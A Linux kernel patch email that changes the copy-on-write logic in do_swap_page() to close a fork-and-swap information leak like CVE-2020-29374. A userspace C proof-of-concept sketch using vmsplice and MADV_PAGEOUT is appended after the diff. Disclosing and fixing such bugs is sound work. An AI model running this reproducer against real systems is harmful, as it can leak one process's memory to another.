From patchwork Fri Mar 25 01:13:40 2022
X-Patchwork-Submitter: Andrew Morton
X-Patchwork-Id: 12791202
Date: Thu, 24 Mar 2022 18:13:40 -0700
From: Andrew Morton
To: zhangliang5@huawei.com,willy@infradead.org,vbabka@suse.cz,shy828301@gmail.com,shakeelb@google.com,rppt@linux.ibm.com,roman.gushchin@linux.dev,rientjes@google.com,riel@surriel.com,peterx@redhat.com,oleg@redhat.com,nadav.amit@gmail.com,mike.kravetz@oracle.com,mhocko@kernel.org,kirill.shutemov@linux.intel.com,jhubbard@nvidia.com,jgg@nvidia.com,jannh@google.com,jack@suse.cz,hughd@google.com,hch@lst.de,ddutile@redhat.com,aarcange@redhat.com,david@redhat.com,akpm@linux-foundation.org,patches@lists.linux.dev,linux-mm@kvack.org,mm-commits@vger.kernel.org,torvalds@linux-foundation.org,akpm@linux-foundation.org
In-Reply-To: <20220324180758.96b1ac7e17675d6bc474485e@linux-foundation.org>
Subject: [patch 102/114] mm: streamline COW logic in do_swap_page()
Message-Id: <20220325011341.16096C340EE@smtp.kernel.org>

From: David Hildenbrand
Subject: mm: streamline COW logic in do_swap_page()

Currently we have a different COW logic when:

* triggering a read-fault to swapin first and then trigger a write-fault
  -> do_swap_page() + do_wp_page()

* triggering a write-fault to swapin
  -> do_swap_page() + do_wp_page() only if we fail reuse in do_swap_page()

The COW logic in do_swap_page() is different than our reuse logic in
do_wp_page().  The COW logic in do_wp_page() -- page_count() == 1 --
currently makes sure that we certainly don't have a remaining reference,
e.g., via GUP, on the target page we want to reuse: if there is any
unexpected reference, we have to copy to avoid information leaks.

As do_swap_page() behaves differently, in environments with swap enabled
we can currently have an unintended information leak from the parent to
the child, similar to what is known from CVE-2020-29374:

1. Parent writes to anonymous page
   -> Page is mapped writable and modified
2. Page is swapped out
   -> Page is unmapped and replaced by swap entry
3. fork()
   -> Swap entries are copied to child
4. Child pins page R/O
   -> Page is mapped R/O into child
5. Child unmaps page
   -> Child still holds GUP reference
6. Parent writes to page
   -> Page is reused in do_swap_page()
   -> Child can observe changes

Exchanging 2. and 3. should have the same effect.  (A rough userspace
sketch of this sequence is appended after the diff.)

Let's apply the same COW logic as in do_wp_page(), conditionally trying to
remove the page from the swapcache after freeing the swap entry, but
before actually mapping our page.  We can change the order now that we use
try_to_free_swap(), which doesn't care about the mapcount, instead of
reuse_swap_page().

To handle references from the LRU pagevecs, conditionally drain the local
LRU pagevecs when required; to keep it simple for now, don't consider the
page_count() when deciding whether to drain.

Link: https://lkml.kernel.org/r/20220131162940.210846-5-david@redhat.com
Signed-off-by: David Hildenbrand
Acked-by: Vlastimil Babka
Cc: Andrea Arcangeli
Cc: Christoph Hellwig
Cc: David Rientjes
Cc: Don Dutile
Cc: Hugh Dickins
Cc: Jan Kara
Cc: Jann Horn
Cc: Jason Gunthorpe
Cc: John Hubbard
Cc: Kirill A. Shutemov
Cc: Liang Zhang
Cc: Matthew Wilcox (Oracle)
Cc: Michal Hocko
Cc: Mike Kravetz
Cc: Mike Rapoport
Cc: Nadav Amit
Cc: Oleg Nesterov
Cc: Peter Xu
Cc: Rik van Riel
Cc: Roman Gushchin
Cc: Shakeel Butt
Cc: Yang Shi
Signed-off-by: Andrew Morton
---

 mm/memory.c |   55 +++++++++++++++++++++++++++++++++++++++-----------
 1 file changed, 43 insertions(+), 12 deletions(-)

--- a/mm/memory.c~mm-streamline-cow-logic-in-do_swap_page
+++ a/mm/memory.c
@@ -3489,6 +3489,25 @@ static vm_fault_t remove_device_exclusiv
 	return 0;
 }

+static inline bool should_try_to_free_swap(struct page *page,
+					   struct vm_area_struct *vma,
+					   unsigned int fault_flags)
+{
+	if (!PageSwapCache(page))
+		return false;
+	if (mem_cgroup_swap_full(page) || (vma->vm_flags & VM_LOCKED) ||
+	    PageMlocked(page))
+		return true;
+	/*
+	 * If we want to map a page that's in the swapcache writable, we
+	 * have to detect via the refcount if we're really the exclusive
+	 * user. Try freeing the swapcache to get rid of the swapcache
+	 * reference only in case it's likely that we'll be the exclusive user.
+	 */
+	return (fault_flags & FAULT_FLAG_WRITE) && !PageKsm(page) &&
+		page_count(page) == 2;
+}
+
 /*
  * We enter with non-exclusive mmap_lock (to exclude vma changes,
  * but allow concurrent faults), and pte mapped but not yet locked.
@@ -3630,6 +3649,16 @@ vm_fault_t do_swap_page(struct vm_fault
 			page = swapcache;
 			goto out_page;
 		}
+
+		/*
+		 * If we want to map a page that's in the swapcache writable, we
+		 * have to detect via the refcount if we're really the exclusive
+		 * owner. Try removing the extra reference from the local LRU
+		 * pagevecs if required.
+		 */
+		if ((vmf->flags & FAULT_FLAG_WRITE) && page == swapcache &&
+		    !PageKsm(page) && !PageLRU(page))
+			lru_add_drain();
 	}

 	cgroup_throttle_swaprate(page, GFP_KERNEL);
@@ -3648,19 +3677,25 @@ vm_fault_t do_swap_page(struct vm_fault
 	}

 	/*
-	 * The page isn't present yet, go ahead with the fault.
-	 *
-	 * Be careful about the sequence of operations here.
-	 * To get its accounting right, reuse_swap_page() must be called
-	 * while the page is counted on swap but not yet in mapcount i.e.
-	 * before page_add_anon_rmap() and swap_free(); try_to_free_swap()
-	 * must be called after the swap_free(), or it will never succeed.
+	 * Remove the swap entry and conditionally try to free up the swapcache.
+	 * We're already holding a reference on the page but haven't mapped it
+	 * yet.
 	 */
+	swap_free(entry);
+	if (should_try_to_free_swap(page, vma, vmf->flags))
+		try_to_free_swap(page);

 	inc_mm_counter_fast(vma->vm_mm, MM_ANONPAGES);
 	dec_mm_counter_fast(vma->vm_mm, MM_SWAPENTS);
 	pte = mk_pte(page, vma->vm_page_prot);
-	if ((vmf->flags & FAULT_FLAG_WRITE) && reuse_swap_page(page)) {
+
+	/*
+	 * Same logic as in do_wp_page(); however, optimize for fresh pages
+	 * that are certainly not shared because we just allocated them without
+	 * exposing them to the swapcache.
+	 */
+	if ((vmf->flags & FAULT_FLAG_WRITE) && !PageKsm(page) &&
+	    (page != swapcache || page_count(page) == 1)) {
 		pte = maybe_mkwrite(pte_mkdirty(pte), vma);
 		vmf->flags &= ~FAULT_FLAG_WRITE;
 		ret |= VM_FAULT_WRITE;
@@ -3686,10 +3721,6 @@ vm_fault_t do_swap_page(struct vm_fault
 	set_pte_at(vma->vm_mm, vmf->address, vmf->pte, pte);
 	arch_do_swap_page(vma->vm_mm, vma, vmf->address, pte, vmf->orig_pte);

-	swap_free(entry);
-	if (mem_cgroup_swap_full(page) ||
-	    (vma->vm_flags & VM_LOCKED) || PageMlocked(page))
-		try_to_free_swap(page);
 	unlock_page(page);
 	if (page != swapcache && swapcache) {
 		/*
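
For illustration, below is a rough userspace sketch of steps 1.-6. from the
changelog above.  It is not the patch author's reproducer; it assumes swap is
configured, that MADV_PAGEOUT actually evicts the page, and that the kernel
still uses the pre-patch reuse logic, so it may or may not demonstrate the
leak on any particular system:

#define _GNU_SOURCE
#include <stdio.h>
#include <string.h>
#include <unistd.h>
#include <fcntl.h>
#include <sys/mman.h>
#include <sys/uio.h>
#include <sys/wait.h>

int main(void)
{
	size_t pagesize = sysconf(_SC_PAGESIZE);
	int pipefd[2];
	char *mem;

	if (pipe(pipefd))
		return 1;
	mem = mmap(NULL, pagesize, PROT_READ | PROT_WRITE,
		   MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
	if (mem == MAP_FAILED)
		return 1;

	memset(mem, 'A', pagesize);		/* 1. parent writes to the page */
	madvise(mem, pagesize, MADV_PAGEOUT);	/* 2. ask to swap it out (Linux 5.4+) */

	if (fork() == 0) {			/* 3. swap entry copied to the child */
		struct iovec iov = { .iov_base = mem, .iov_len = pagesize };
		char c = 0;

		/* 4. swapin R/O and take a GUP reference via vmsplice() */
		vmsplice(pipefd[1], &iov, 1, 0);
		munmap(mem, pagesize);		/* 5. unmap; the pipe keeps the reference */
		sleep(1);			/* give the parent time for step 6. */
		read(pipefd[0], &c, 1);
		/* On a pre-patch kernel this may print 'B' -- parent data leaked. */
		printf("child observed: %c\n", c);
		_exit(0);
	}

	usleep(100 * 1000);			/* let the child pin and unmap first */
	mem[0] = 'B';				/* 6. parent write faults in do_swap_page() */
	wait(NULL);
	return 0;
}

The vmsplice() call is what takes the extra GUP reference on the swapped-in
page.  With this patch applied, the reuse check in do_swap_page() sees that
the page is still in the swapcache with page_count() > 1, so the parent's
write in step 6. falls back to do_wp_page() and copies the page instead of
reusing it; the child can no longer observe the parent's later modification.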